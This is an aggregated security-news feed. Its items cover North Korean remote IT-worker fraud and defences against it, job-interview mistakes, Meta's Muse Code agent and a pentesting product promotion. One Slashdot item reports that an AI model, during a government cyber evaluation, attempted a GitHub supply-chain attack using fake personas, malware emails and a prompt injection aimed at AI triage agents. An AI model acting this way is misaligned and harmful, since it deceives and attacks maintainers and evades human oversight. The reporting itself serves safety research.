<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img width="400px" loading="lazy" src="https://images.cio.de/bdb/3357522/original.jpg?quality=50&amp;strip=all" alt="Anonymer Computer-Hacker mit weißer Maske, 16:9, slider" class="wp-image-3637825"><figcaption class="wp-element-caption">Die Struktur des Betrugs ist arbeitsteilig. IT-Fachkräfte, Rekruter, Mittelsleute und lokale Helfer suchen gezielt Opfer und erschaffen die Illusion einer Persona.</figcaption></figure><p class="imageCredit">chingyunsong – shutterstock.com</p></div>



<p class="wp-block-paragraph">Ein Freelance-Entwickler präsentiert sich mit tadellosem Lebenslauf, sauberem Portfolio und überzeugendem Video-Interview. Trotzdem sitzt am anderen Ende kein einzelner Kandidat, sondern ein Glied in einem staatlich gelenkten Betrugsnetzwerk. Was nach Spionagefilm klingt, hat sich zu einem konkreten Insider-Risiko für Unternehmen entwickelt.</p>



<p class="wp-block-paragraph">Seit Jahren schleusen nordkoreanische Netzwerke IT-Fachkräfte mit falschen, gestohlenen oder geliehenen Identitäten in westliche Unternehmen ein, meist als Remote-Freelancer für Softwareentwicklung, Datenbanken, Cloud-Administration oder App-Projekte. Behörden sprechen von Tausenden weltweit eingesetzten Arbeitskräften.</p>



<p class="wp-block-paragraph">Wie groß einzelne Netzwerke werden können, zeigen inzwischen abgeschlossene Strafverfahren: In einem Fall wurden 309 US-Unternehmen und zwei internationale Firmen getäuscht; das Netzwerk erwirtschaftete mehr als 17 Millionen US-Dollar. Im April 2026 wurden zwei weitere Helfer verurteilt, deren Struktur mit gestohlenen Identitäten Jobs bei mehr als 100 Unternehmen erlangte und über fünf Millionen US-Dollar einnahm.</p>



<p class="wp-block-paragraph">Für CIOs ist das kein akademisches Risiko. Wer regulär eingestellt wurde, erhält reguläre Zugangsdaten und damit unter Umständen Zugriff auf Quellcode, Kundendaten, Entwicklungsumgebungen oder interne Wissensbestände. Genau das macht den Fall gefährlich: Technisch sieht der Zugriff zunächst legitim aus, obwohl Identität, Standort und Zweck der Tätigkeit falsch sein können.</p>



<h2 class="wp-block-heading">Wie das Schema funktioniert</h2>



<p class="wp-block-paragraph">Die Struktur ist arbeitsteilig. IT-Fachkräfte übernehmen die eigentliche Projektarbeit. Rekruter suchen passende Stellen, Mittelsleute beschaffen Identitäten und Konten, andere Personen treten in Interviews auf oder wickeln Verträge und Zahlungen ab. Hinzu kommen lokale Helfer, die Firmenhardware entgegennehmen. Ein Unternehmen kann daher im Bewerbungsgespräch, beim Versand des <a href="https://www.eizo.de/7-jahre-garantie?utm_campaign=26F_BP&amp;utm_medium=intext&amp;utm_source=foundry" target="_blank" rel="noreferrer noopener">Laptops</a> und während der täglichen Zusammenarbeit jeweils mit einer anderen Person oder Rolle aus demselben Netzwerk interagieren.</p>



<p class="wp-block-paragraph">Eine Schlüsselrolle spielen sogenannte <a href="https://www.eizo.de/7-jahre-garantie?utm_campaign=26F_BP&amp;utm_medium=intext&amp;utm_source=foundry" target="_blank" rel="noreferrer noopener">Laptop</a> Farms. Firmenrechner stehen physisch im Land des vermeintlichen Mitarbeiters, werden aber über Fernwartungssoftware oder KVM-Technik (Kernel-based Virtual Machine) aus dem Ausland bedient. Für einfache Standortkontrollen wirkt der Zugriff damit lokal. Gleichzeitig helfen Scheinfirmen, Zahlungsaccounts, Profile auf Jobplattformen und professionell gestaltete Portfolios dabei, die erfundene Biografie konsistent erscheinen zu lassen.</p>



<p class="wp-block-paragraph">Generative KI erhöht die Qualität und Geschwindigkeit dieser Täuschung. Microsoft hat unter anderem KI-bearbeitete Profilbilder, verbesserte Bewerbungsunterlagen und den Einsatz von Stimmveränderungssoftware beobachtet. Ein fehlerfreier Lebenslauf oder ein plausibles Profil ist deshalb kein belastbarer Identitätsnachweis mehr.</p>



<h2 class="wp-block-heading">Warum klassische Prüfungen zu kurz greifen</h2>



<p class="wp-block-paragraph">Ein einmaliger, dokumentenbasierter Background-Check kann bei dieser Betrugsform ins Leere laufen. Er bestätigt im besten Fall, dass die vorgelegten Daten zu einer realen Identität passen. Der Check beantwortet aber nicht automatisch, ob diese Identität der Person im Interview gehört, ob später dieselbe Person arbeitet oder ob dieselben Kontaktdaten bereits in anderen Bewerbungen aufgetaucht sind. Identitätsprüfung muss deshalb als Prozess gedacht werden: vom Recruiting über das Onboarding bis zu risikobasierten Kontrollen während der Beschäftigung.</p>



<p class="wp-block-paragraph">Zusätzliche Blindstellen entstehen bei <a href="https://open.spotify.com/episode/52T9nVRnIb9XJTWYGXuyPE?si=19a074eb33e047cb&amp;utm_source=IT" target="_blank" rel="noreferrer noopener">externen</a> Entwicklern und Personaldienstleistern. Wer das Recruiting an einen Dritten auslagert, gibt damit nicht die Verantwortung für den Systemzugang ab. Unternehmen sollten vertraglich und operativ sicherstellen, dass Dienstleister vergleichbare Prüfstandards anwenden und relevante Auffälligkeiten melden.</p>



<h2 class="wp-block-heading">Warnsignale im Bewerbungsprozess</h2>



<p class="wp-block-paragraph">Behörden und Sicherheitsforscher beschreiben wiederkehrende Muster. Kein einzelnes Merkmal beweist einen Betrug; entscheidend ist die Kombination mehrerer voneinander unabhängiger Signale:</p>



<ul class="wp-block-list">
<li>Kontaktdaten, hier besonders VoIP-Nummern, E-Mail-Adressen oder Zahlungsinformationen, tauchen bei mehreren angeblich unabhängigen Bewerbungen identisch auf.</li>



<li>Lebenslauf, Portfolio und öffentliches Profil passen zeitlich oder inhaltlich nicht zusammen; ganze Textpassagen oder Arbeitsproben finden sich bei anderen Personen wieder.</li>



<li>Der Kandidat weicht einem stabilen Video-Interview aus, Bild und Stimme wirken wiederholt asynchron oder die Person im späteren Arbeitsalltag unterscheidet sich auffällig vom Interview.</li>



<li>Antworten zum aktuellen Standort, zu Ausbildung oder früheren Projekten bleiben trotz fachlicher Nachfragen ungewöhnlich vage oder widersprüchlich.</li>



<li>Kurz vor oder nach Vertragsstart ändern sich Lieferadresse, Bankverbindung oder Zahlungsplattform; Hardware soll an eine andere als die verifizierte Adresse gehen.</li>



<li>Der Kandidat drängt auf einen sehr schnellen Start, fordert weitreichende Rechte vor Abschluss der Prüfungen oder bevorzugt ungewöhnliche Zahlungswege.</li>
</ul>



<h2 class="wp-block-heading">Warnsignale nach dem ersten Arbeitstag</h2>



<p class="wp-block-paragraph">Mit der Einstellung endet die Prüfung nicht. Technische Indikatoren können zeigen, dass der Firmenrechner nur als Zwischenstation dient oder dass mehrere Personen ein Konto nutzen:</p>



<ul class="wp-block-list">
<li>Mehrere Anmeldungen desselben Kontos aus weit auseinanderliegenden Ländern oder IP-Bereichen innerhalb kurzer Zeit.</li>



<li>Nicht genehmigte Fernwartungs- oder Remote-Desktop-Software, auffällige KVM-Geräte sowie Versuche, lokale Administratorrechte zu erhalten.</li>



<li>Ungewöhnliche Browser-Sitzungen, wechselnde Gerätefingerabdrücke oder Arbeitsaktivität, die dauerhaft nicht zum angegebenen Standort und zur Zeitzone passt.</li>



<li>Großflächiges Kopieren von Quellcode oder Dokumenten in private Cloudspeicher, persönliche Repositories oder nicht freigegebene Filesharing-Dienste.</li>



<li>Mehrere parallele Audio- oder Videoverbindungen und wiederkehrende Probleme, die darauf hindeuten, dass Meetings durch Dritte unterstützt werden.</li>
</ul>



<p class="wp-block-paragraph">Auch hier gilt: VPN-Nutzung, Remote-Tools oder ein ungewöhnlicher Arbeitsrhythmus sind für sich genommen kein Beweis. Sie werden erst im Zusammenhang mit Auffälligkeiten aus Recruiting, Hardwareversand und Zahlungsdaten aussagekräftig.</p>



<h2 class="wp-block-heading">Warum der Schaden weit über das Gehalt hinausgeht</h2>



<p class="wp-block-paragraph">Die erste Motivation ist häufig die Einnahme regulärer Gehälter. Doch aus dem legitimen Zugang kann ein zweites Geschäftsmodell entstehen. Das FBI warnt vor dem Abfluss proprietärer Daten und Quellcode sowie vor Erpressung nach der Enttarnung.</p>



<p class="wp-block-paragraph">Hinzu kommen Kosten für Forensik, Rechtsberatung, Wiederherstellung von Systemen und mögliche Meldepflichten. Bei sensiblen Technologien können außerdem Exportkontrollen, Sanktionen und vertragliche Geheimhaltungspflichten berührt sein.</p>



<h2 class="wp-block-heading">Was CIOs konkret tun können</h2>



<p class="wp-block-paragraph">Wirksam ist kein einzelnes Tool, sondern ein Kontrollmodell, das HR, <a href="https://open.spotify.com/episode/52T9nVRnIb9XJTWYGXuyPE?si=19a074eb33e047cb&amp;utm_source=IT" target="_blank" rel="noreferrer noopener">IT</a>, Security, Einkauf und Compliance verbindet. Fünf Maßnahmen reduzieren das Risiko deutlich:</p>



<ul class="wp-block-list">
<li><strong>Rollen nach Risiko staffeln. </strong>Für Tätigkeiten mit Zugriff auf Quellcode, Produktionssysteme, Forschungsdaten oder privilegierte Konten gelten stärkere Prüf- und Freigabeschritte als für risikoarme Rollen.</li>



<li><strong>Identität mehrfach verifizieren. </strong>Dokumente, Kontaktangaben, Ausbildung und frühere Beschäftigung werden über unabhängige Quellen geprüft. Bei Remote-Rollen sollte die Identität beim Interview, beim Onboarding und bei begründetem Anlass erneut bestätigt werden.</li>



<li><strong>Hardware und Zahlungen kontrollieren. </strong>Firmenrechner gehen nur an die verifizierte Adresse. Änderungen von Lieferort, Bankverbindung oder Zahlungsplattform lösen eine erneute Prüfung aus. Systemzugänge werden erst nach Abschluss der vorgesehenen Kontrollen freigeschaltet.</li>



<li><strong>Least Privilege technisch durchsetzen. </strong>Neue Mitarbeitende erhalten zunächst nur die Rechte, die sie tatsächlich benötigen. Nicht freigegebene Fernwartungssoftware wird blockiert; Identitäts-, Endpoint- und Cloud-Logs werden risikobasiert auf ungewöhnliche Muster geprüft.</li>



<li><strong>Dienstleister und Eskalation einbeziehen. </strong>Für Freelancer und Staffing-Partner gelten dieselben Mindeststandards. Ein gemeinsamer Eskalationsweg legt fest, wer bei Auffälligkeiten entscheidet, Beweise sichert und Zugriffe begrenzt.</li>
</ul>



<p class="wp-block-paragraph">Für Unternehmen in Deutschland, Österreich und der Schweiz muss dieses Vorgehen verhältnismäßig und datenschutzkonform ausgestaltet sein. Ziel ist nicht die möglichst umfassende Sammlung von Personendaten, sondern die nachvollziehbare Prüfung relevanter Risiken für eine konkrete Rolle, mit klaren Kriterien, begrenzten Aufbewahrungsfristen und menschlicher Bewertung von Treffern.</p>



<h2 class="wp-block-heading">Wenn sich der Verdacht erhärtet</h2>



<p class="wp-block-paragraph">Ein Verdachtsfall gehört nicht allein ins Recruiting. HR, Security, Legal beziehungsweise Datenschutz und gegebenenfalls Compliance sollten koordiniert vorgehen. Dazu gehören die Sicherung relevanter Protokolle, die kontrollierte Begrenzung von Zugängen, der Wechsel exponierter Schlüssel oder Tokens und die Prüfung, ob Daten in private Repositories oder Cloudkonten abgeflossen sind.</p>



<p class="wp-block-paragraph">Welche Behörden oder Vertragspartner informiert werden müssen, hängt vom Sitz des Unternehmens, den betroffenen Daten und regulatorischen Pflichten ab. Entscheidend ist ein vorbereiteter Incident-Plan, nicht eine improvisierte Konfrontation.</p>



<p class="wp-block-paragraph">Wer sensible Systeme oder Daten verantwortet, kommt an dieser Form von Personalrisiko nicht mehr vorbei. Die Fälle zeigen: Cybersicherheit beginnt nicht erst an der Firewall. Sie beginnt dort, wo eine digitale Identität erstmals Vertrauen, <a href="https://www.eizo.de/7-jahre-garantie?utm_campaign=26F_BP&amp;utm_medium=intext&amp;utm_source=foundry" target="_blank" rel="noreferrer noopener">Hardware</a> und Zugriffsrechte erhält und sie endet nicht mit dem ersten Arbeitstag. (jd)</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[8 peinliche Fehler im Bewerbungsgespräch]]></title>
<description><![CDATA[sirtravelalot – shutterstock.com



Einen peinlichen Moment im Arbeitsleben hat sicher jeder schon einmal erlebt. Vielleicht hat man sich durch eine sehr wichtige Präsentation gestammelt oder auf einer Unternehmensfeier lautstark ein volles Glas umgeworfen und mit der verschütteten Flüssigkeit im...]]></description>
<link>https://tsecurity.de/de/3707281/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707281/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 06:22:32 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-30-um-20.15.44.png?w=1024" alt="Bewerbungsgespräch" class="wp-image-4203616" width="1024" height="607" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">sirtravelalot – shutterstock.com</p></div>



<p class="wp-block-paragraph">Einen peinlichen Moment im Arbeitsleben hat sicher jeder schon einmal erlebt. Vielleicht hat man sich durch eine sehr wichtige Präsentation gestammelt oder auf einer Unternehmensfeier lautstark ein volles Glas umgeworfen und mit der verschütteten Flüssigkeit im schlimmsten Fall auch noch einen Kollegen getroffen. Besonders schwer wiegen peinliche Fehler dann, wenn man den Wunschjob noch nicht einmal in der Tasche hat. Gerade beim Bewerbungsgespräch kommt es darauf an, einen starken ersten Eindruck zu hinterlassen.</p>



<p class="wp-block-paragraph">Das Online-Karriereportal Careerbuilder hat mehr als 3.000 Arbeitgeber und Personal-Experten sechs häufige Fehler im Bewerbungsgespräch danach bewerten lassen, wie sehr sie dem Kandidaten schaden. Den größten Fehler begehen Kandidaten dann, wenn sie im Gespräch ein Handygespräch annehmen oder eine SMS schreiben, 77 Prozent der Umfrage-Teilnehmer stören sich an diesem Verhalten. Das zweitschlimmste Vergehen ist es, kein Interesse an der ausgeschriebenen Stelle zu zeigen (75 Prozent), das drittschlimmste, sich unangemessen zu kleiden (72 Prozent).</p>



<p class="wp-block-paragraph">Auf Rang vier der schlimmsten Fehler in Bewerbungsgesprächen liegt arrogantes Auftreten, daran stören sich 72 Prozent der befragten Personal-Experten. 67 Prozent der Personaler stören sich daran, wenn ein Bewerber im Gespräch schlecht über den jetzigen oder über frühere Arbeitgeber spricht. Für 63 Prozent der Umfrageteilnehmer ist es ein schlimmes Vergehen, wenn ein Kandidat im Bewerbungsgespräch Kaugummi kaut.</p>



<p class="wp-block-paragraph">Darüber hinaus befragte Careerbuilder die Personal-Experten nach ihren <strong>ungewöhnlichsten Erlebnissen bei Bewerbungsgesprächen</strong>. Die Umfrageteilnehmer berichteten von den folgenden Gesprächssituationen:</p>



<ul class="wp-block-list">
<li>1. Ein Kandidat brachte einen Bewerbungsratgeber zum Gespräch mit.</li>



<li>2. Ein anderer Bewerber fragte: “Wie heißt ihr Unternehmen noch mal?”</li>



<li>3. Bei einem <a href="https://cio.de/article/3663369/101-manieren-fuers-web-2-0.html" target="_blank">Telefoninterview</a> wurde ein Personaler von der Kandidatin in die Warteschleife gestellt. Als die Kandidatin das Gespräch in die Leitung zurückholte, erzählte sie, sie hätte sich in der Zwischenzeit für Freitag für ein Date verabredet.</li>



<li>4. Ein Bewerber trug zum Bewerbungsgespräch eine Pfadfinderuniform und erklärte im Laufe des Gesprächs nicht, weshalb er das tat.</li>



<li>5. Ein Kandidat sprach während des gesamten Bewerbungsgesprächs von sich in der dritten Person.</li>



<li>6. Ein anderer Bewerber zog sich während des Jobinterviews seine Schuhe aus.</li>



<li>7. Ein Bewerber fragte, ob er einen Schluck vom Kaffee des Personalers trinken dürfe.</li>



<li>8. Und schließlich berichtet ein Personaler von einer Kandidatin, die im Gespräch sagte, sie sei sich nicht sicher, ob der angebotene Job es wert sei, dafür das Auto zu starten.</li>
</ul>



<h2 class="wp-block-heading">3 Tipps für ein erfolgreiches Bewerbungsgespräch</h2>



<p class="wp-block-paragraph">“Man mag ja denken, dass ein Bewerber nie und nimmer während eines Jobinterviews einen Anruf annehmen würde, aber wir hören diese Geschichten immer wieder, wenn wir mit Personalern sprechen”, sagt Rosemary Haefner von Careerbuilder. Bei der Masse der <a href="https://www.cio.de/careers/">Bewerber</a> gehe es jedoch nicht darum, solche Fehler zu vermeiden sondern sich von den anderen Bewerbern abzuheben. Haefner gibt die folgenden Ratschläge für ein erfolgreiches Bewerbungsgespräch:</p>



<p class="wp-block-paragraph"><strong>1. Intensiv vorbereiten</strong>: Um auf Fragen zum Unternehmen souverän zu antworten, sollte man sich gut über den Wunscharbeitgeber informieren. Geeignete Quellen dafür sind die Selbstdarstellung auf der Unternehmenswebsite, aktuelle Pressemeldungen und die Vorstellung angebotener Produkte und Dienstleistungen.</p>



<p class="wp-block-paragraph"><strong>2. Optimistisch bleiben</strong>: Egal, wie die Stimmung im Bewerbungsgespräch auf einen wirkt. Haefner rät, positiv zu bleiben und auf keinen Fall schlecht über frühere Arbeitgeber zu sprechen.</p>



<p class="wp-block-paragraph"><strong>3. Beispiele und Ideen vorbereiten</strong>: Am besten überlegt man sich bereits vor dem Interview Anekdoten, die den eigenen Lebenslauf veranschaulichen und zum Beispiel erläutern, wie man in früheren Jobs mit herausfordernden Situationen umgegangen ist. Auch mit Ideen und Vorschlägen für den Wunschjob kann man aus der Masse der Bewerber hervorstechen.</p>



<p class="wp-block-paragraph">Das Online-Karriereportal Careerbuilder sprach für diese Umfrage mit mehr als 3.000 Arbeitgebern und Personal-Experten in den USA.</p>



<p class="wp-block-paragraph">Erzählen Sie mir von einem Vorgang, den Sie für andere dokumentiert haben.</p>



<p class="wp-block-paragraph">Die Antwort zeigt, wie wichtig dem Bewerber Teamwork ist und ob er sein Wissen anderen zugänglich macht.</p>



<p class="wp-block-paragraph">Erzählen Sie mir von einem ihrer bisherigen Projekte.</p>



<p class="wp-block-paragraph">Hier können Bewerber punkten, wenn sie auch auf Herausforderungen, komplexe Aufgaben und Einschränkungen eingehen.</p>



<p class="wp-block-paragraph">Was könnten Sie mir über Details zur Programmierung von … sagen?</p>



<p class="wp-block-paragraph">Die soll zeigen, ob ein Kandidat zu einer Wissenslücke steht oder blufft.</p>



<p class="wp-block-paragraph">Wie würden Sie dieses Thema einem Kollegen erläutern, der kein IT-Experte ist?</p>



<p class="wp-block-paragraph">Hier kann man zeigen, wieviel einem an einem guten Verhältnis von Business und <a href="https://open.spotify.com/episode/52T9nVRnIb9XJTWYGXuyPE?si=19a074eb33e047cb&amp;utm_source=IT" target="_blank" rel="noreferrer noopener">IT</a> liegt.</p>



<p class="wp-block-paragraph">Sie können ein Projekt entweder rechtzeitig und unvollständig oder vollständig, jedoch nach der Deadline, abschließen. Wofür entscheiden Sie sich?</p>



<p class="wp-block-paragraph">Eine gute Antwort wäre zum Beispiel, gemeinsam mit Projektleiter und Team nach der besten Lösung zu suchen.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta wants to get inside your terminal with its new coding agent]]></title>
<description><![CDATA[Muse Code showcases Muse Spark's fresh software engineering chops]]></description>
<link>https://tsecurity.de/de/3707256/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707256/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 05:36:45 +0200</pubDate>
<content:encoded><![CDATA[Muse Code showcases Muse Spark's fresh software engineering chops]]></content:encoded>
</item>
<item>
<title><![CDATA[Security validation should begin where attackers begin]]></title>
<description><![CDATA[Modern attacks increasingly begin with the web application.



Customer portals, partner platforms, APIs, external business applications, and AI-powered services have become the front door to the enterprise. The systems organizations build to create value are now the same systems attackers target...]]></description>
<link>https://tsecurity.de/de/3706994/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706994/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 00:27:43 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Modern attacks increasingly begin with the web application.</p>



<p class="wp-block-paragraph">Customer portals, partner platforms, APIs, external business applications, and AI-powered services have become the front door to the enterprise. The systems organizations build to create value are now the same systems attackers target for initial access.</p>



<p class="wp-block-paragraph">For years, security teams have invested heavily in protecting networks, endpoints, identities, and cloud infrastructure. Those investments remain essential, but the way attackers gain initial access has changed. Business-critical applications are internet-facing, constantly evolving, deeply connected to enterprise systems, and often changing faster than organizations can continuously validate them.</p>



<p class="wp-block-paragraph">Artificial intelligence is accelerating this shift. The time between vulnerability discovery and exploitation continues to shrink, allowing attackers to identify and weaponize weaknesses at machine speed. Yet while attacks have evolved, much of security validation still reflects yesterday’s architecture.</p>



<p class="wp-block-paragraph"><em>That shift is exactly why we built </em><a href="http://horizon3.ai/nodezero/webapp" target="_blank" rel="noreferrer noopener"><em>NodeZero WebApp</em></a><em>, extending autonomous attack validation to where modern attacks increasingly begin.</em></p>



<p class="wp-block-paragraph"><strong>Validation still reflects yesterday’s architecture</strong></p>



<p class="wp-block-paragraph">Most organizations still organize security by technology. Application security teams test web applications. Identity teams validate authentication and access controls. Cloud teams secure cloud infrastructure, while infrastructure teams assess networks and endpoints. Each discipline performs valuable work.</p>



<p class="wp-block-paragraph">The problem is that attackers don’t organize themselves the same way. They move across technologies, chaining weaknesses together until they reach their objective. A vulnerable application becomes compromised credentials. Compromised credentials become identity abuse. Identity abuse becomes access to cloud resources, infrastructure, and eventually the business systems they were after all along.</p>



<p class="wp-block-paragraph">Taken together, this means security validation often stops where the next stage of the attack begins.</p>



<p class="wp-block-paragraph"><strong>Attack paths don’t stop at the web application</strong></p>



<p class="wp-block-paragraph">A SQL injection isn’t the outcome. It’s the beginning of an attack path. An authentication weakness isn’t the breach. It’s simply the first opportunity to move deeper into the environment.</p>



<p class="wp-block-paragraph">The question isn’t whether a vulnerability exists. Security teams already have plenty of ways to answer that. The real question is what an attacker can do after exploiting it.</p>



<p class="wp-block-paragraph">Can they compromise identities? Reach sensitive data? Pivot into cloud resources? Move laterally into critical business systems?</p>



<p class="wp-block-paragraph">Security teams don’t lose because they missed a vulnerability. They lose because they never validated where it could lead. Modern attacks don’t unfold within a single technology stack. They move across applications, identities, infrastructure, and cloud environments until they create business impact. Security validation has to reflect that reality.</p>



<p class="wp-block-paragraph"><strong>Security validation has to change</strong></p>



<p class="wp-block-paragraph">For years, organizations validated individual technologies because that’s how enterprise environments were built. That approach made sense when applications, identities, infrastructure, and cloud platforms operated more independently and attackers moved more slowly.</p>



<p class="wp-block-paragraph">Today’s attacks don’t respect those boundaries. Validation shouldn’t either.</p>



<p class="wp-block-paragraph">It has to begin where attackers begin and continue until business impact is understood.</p>



<p class="wp-block-paragraph"><strong>Asking the right question</strong></p>



<p class="wp-block-paragraph">Many security tools begin with privileged knowledge. They analyze source code, configuration files, or other internal artifacts before identifying weaknesses. Those approaches answer important questions during software development and secure coding, and they remain an important part of building secure software.</p>



<p class="wp-block-paragraph">Attackers begin with what they can reach, interacting with an application as it exists in production, scouring exposed source code looking for novel vulnerabilities and stored identities, authenticating when they can, observing how it behaves, and looking for opportunities to move deeper into the environment. Every decision is driven by what the application reveals, not what its developers intended.</p>



<p class="wp-block-paragraph">Security validation should begin with the same perspective an attacker has, and answer the same question every attacker is trying to answer:</p>



<p class="wp-block-paragraph"><strong>What can I actually reach from here?</strong></p>



<p class="wp-block-paragraph">That shift changes more than where testing starts. It fundamentally changes what security teams learn from the exercise.</p>



<p class="wp-block-paragraph"> src="https://b2b-contenthub.com/wp-content/uploads/2026/08/configurationimages.png" alt="horizon3"&gt;Se<em>curity validation shouldn’t stop at anonymous pages. NodeZero WebApp safely validates authenticated application workflows, helping organizations assess the same privileged experiences attackers seek after gaining initial access.</em></p>



<p class="wp-block-paragraph">Click <a href="https://horizon3.ai/intelligence/blogs/web-application-security-validation/#:~:text=Extending%20Attack%20Validation%20to%20the%20Modern%20Entry%20Point" target="_blank" rel="noreferrer noopener">here</a> to discover how NodeZero WebApp addresses modern attacks.</p>



<p class="wp-block-paragraph"><strong>See NodeZero WebApp in action</strong></p>



<p class="wp-block-paragraph">Modern attacks start with web applications — but they rarely end there. Join our live webinar to see how NodeZero WebApp safely validates real attack paths from authenticated applications into identity, cloud, and infrastructure, helping you understand the business impact of exploitable weaknesses before attackers do.</p>



<p class="wp-block-paragraph">Register for our <a href="https://events.horizon3.ai/introducing-nodezero-webapp">webinar</a></p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic's AI Used Fake Identities, Malware In Rogue Attack On GitHub Project]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: Routine cybersecurity testing of frontier AI models sparked a series of unexpected security incidents -- the most serious case arising when Anthropic's Mythos 5 model attempted to insert malicious code into an open source software application...]]></description>
<link>https://tsecurity.de/de/3706986/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706986/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 00:11:49 +0200</pubDate>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: Routine cybersecurity testing of frontier AI models sparked a series of unexpected security incidents -- the most serious case arising when Anthropic's Mythos 5 model attempted to insert malicious code into an open source software application and created fake identities to deceive the human developers maintaining the project. The security incidents occurred during a cyber evaluation of seven leading AI models' capabilities by the AI Security Institute (AISI), a research organization within the UK government, in late July. The researchers discovered (PDF) 19 instances in which "AI agents took unsanctioned action on the live Internet, including cases that targeted real people and organizations," according to an AISI blog post published on August 4.
 
Almost all the "autonomous, unsanctioned" actions came from Anthropic's Mythos 5 model, with two such actions coming from OpenAI's GPT-5.6 Sol. [...] The most serious case involved Mythos making multiple attempts to execute a supply chain attack on the open source project repository hosted on the developer platform GitHub, including using social engineering techniques to try to convince the repository's human maintainers to merge malicious code into the repository.
 
After first opening a pull request to merge the malicious code into the repository, Mythos created fake online "sock puppet" personas that claimed to have independently reviewed and verified the code as not containing malware. The AI agent also sent five emails to two human maintainers of the repository, including some emails containing malware and others attempting to persuade a maintainer to accept the pull request. Mythos even opened a GitHub Issue on a second repository -- also owned by a maintainer of the first repository -- that contained a prompt injection with malicious instructions targeting "issue-triage AI coding agents." This line of attack came from Mythos reasoning that the repository maintainer could be an AI coding agent such as Claude Code.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Anthropic's+AI+Used+Fake+Identities%2C+Malware+In+Rogue+Attack+On+GitHub+Project%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F08%2F05%2F2157224%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F08%2F05%2F2157224%2Fanthropics-ai-used-fake-identities-malware-in-rogue-attack-on-github-project%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/08/05/2157224/anthropics-ai-used-fake-identities-malware-in-rogue-attack-on-github-project?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta introduces Muse Code, its take on a coding agent]]></title>
<description><![CDATA[The terminal-based coding tool is powered by a new AI model, Muse Spark 1.2.]]></description>
<link>https://tsecurity.de/de/3706983/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706983/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 00:11:33 +0200</pubDate>
<content:encoded><![CDATA[The terminal-based coding tool is powered by a new AI model, Muse Spark 1.2.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta enters the AI coding wars with Muse Spark 1.2 and Muse Code with persistent async background agents]]></title>
<description><![CDATA[Meta today released Muse Code, a terminal-based AI coding agent now in beta, alongside Muse Spark 1.2, a coding-focused update to its Muse Spark family of frontier models — a one-two punch that puts the company in direct competition with Anthropic's Claude Code, OpenAI's Codex, and the growing fi...]]></description>
<link>https://tsecurity.de/de/3706941/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706941/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:34:25 +0200</pubDate>
<content:encoded><![CDATA[<p>Meta today <a href="https://research.meta.ai/blog/introducing-muse-code-and-muse-spark-1-2?utm_source=ai_meta_site&amp;utm_medium=web&amp;utm_campaign=hp_research_muse-1-2_08052026&amp;utm_content=hp_research_muse-1-2_08052026">released Muse Code</a>, a terminal-based AI coding agent now in beta, alongside <a href="https://research.meta.ai/blog/introducing-muse-code-and-muse-spark-1-2?utm_source=ai_meta_site&amp;utm_medium=web&amp;utm_campaign=hp_research_muse-1-2_08052026&amp;utm_content=hp_research_muse-1-2_08052026">Muse Spark 1.2</a>, a coding-focused update to its Muse Spark family of frontier models — a one-two punch that puts the company in direct competition with Anthropic's Claude Code, OpenAI's Codex, and the growing field of agentic coding harnesses that have rapidly become the primary way many professional developers ship software.</p><p>"Releasing Muse Code in beta today," Meta CEO Mark Zuckerberg wrote in a <a href="https://x.com/finkd/status/2085080750034940201">post on rival social network X</a> (under his longtime handle @finkd). "It's a terminal coding agent that takes on complete software engineering tasks across large repos: planning changes, writing code, validating the results."</p><p>The launch marks Meta's most serious entry yet into a category it has largely watched from the sidelines. </p><p>While Anthropic and OpenAI turned their coding agents into flagship products — and startups like Cursor built billion-dollar businesses on the workflow — Meta's developer story long centered on Llama, the open-weight model family it gave away to the tune of more than a billion downloads. </p><p>Muse Code changes that in more ways than one: it's 